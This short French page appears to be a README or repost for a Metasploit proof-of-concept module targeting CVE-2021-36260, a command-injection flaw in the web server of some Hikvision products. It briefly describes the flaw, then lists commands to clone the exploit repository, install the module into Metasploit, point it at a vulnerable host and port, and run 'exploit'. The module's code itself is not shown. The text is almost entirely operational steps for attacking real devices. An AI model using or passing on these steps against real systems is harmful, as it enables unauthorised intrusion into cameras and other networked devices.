
le script metasploit (POC) concernant CVE-2021-36260
Le script metasploit (POC) concernant CVE-2021-36260. Une vulnérabilité d'injection de commandes dans le serveur web de certains produits Hikvision, un attaquant peut exploiter la vulnérabilité pour lancer une attaque d'injection de commandes en envoyant des messages avec des commandes malveillantes.
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
